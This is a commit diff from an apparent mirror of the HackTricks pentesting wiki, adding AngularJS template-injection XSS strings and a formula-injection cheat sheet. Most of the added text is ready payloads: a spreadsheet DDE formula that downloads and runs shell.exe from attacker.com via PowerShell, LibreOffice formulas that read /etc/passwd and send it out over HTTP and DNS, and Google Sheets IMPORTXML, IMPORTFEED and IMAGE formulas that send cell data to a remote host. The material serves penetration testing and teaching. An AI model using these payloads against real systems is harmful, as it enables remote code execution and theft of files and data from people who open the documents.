Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 2 pages modified

Browse source
This commit is contained in:
CPol 2021-06-29 12:49:13 +00:00 committed by gitbook-bot
parent 45f8827eee
commit bc72708577
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 73 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
pentesting-web/client-side-template-injection-csti.md
View file

@ -16,6 +16,7 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
@ -23,6 +24,10 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)
{% hint style="danger" %}
\*\*\*\*[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
{% endhint %}
### VueJS
You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)

68
pentesting-web/formula-injection.md
View file

@ -43,3 +43,71 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%281%29.png)
### More
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
## LFI
#### LibreOffice Calc
* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
* file:///etc/passwd\#$passwd.A19 Will read the 19th line from the local /etc/passwd file
* ENCODEURL\(file:///etc/passwd\#$passwd.A19\) URL encode the returned data
* MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\) Similar to substring, read data from 1st character to 41st a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* SUBSTITUTE\(MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\),”%”,”-“\) replace all instances of % \(the special character from URL encoding\) with dash this is ensure that only valid DNS characters are used
* CONCATENATE\(\(SUBSTITUTE\(MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\),”%”,”-“\)\),”.&lt;FQDN&gt;”\) Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* WEBSERVICE Will make a request for this non-existent DNS name which we can then parse the logs \(or run tcpdump etc.\) on the DNS authoritative name server for which we have control
## Google Sheets OOB Data Exfiltration
Firstly, lets introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```text
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```text
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: Imports a RSS or ATOM feed.
```text
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: Imports data from a table or list within an HTML page.
```text
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.
```text
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: Inserts an image into a cell.
```text
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## References
{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}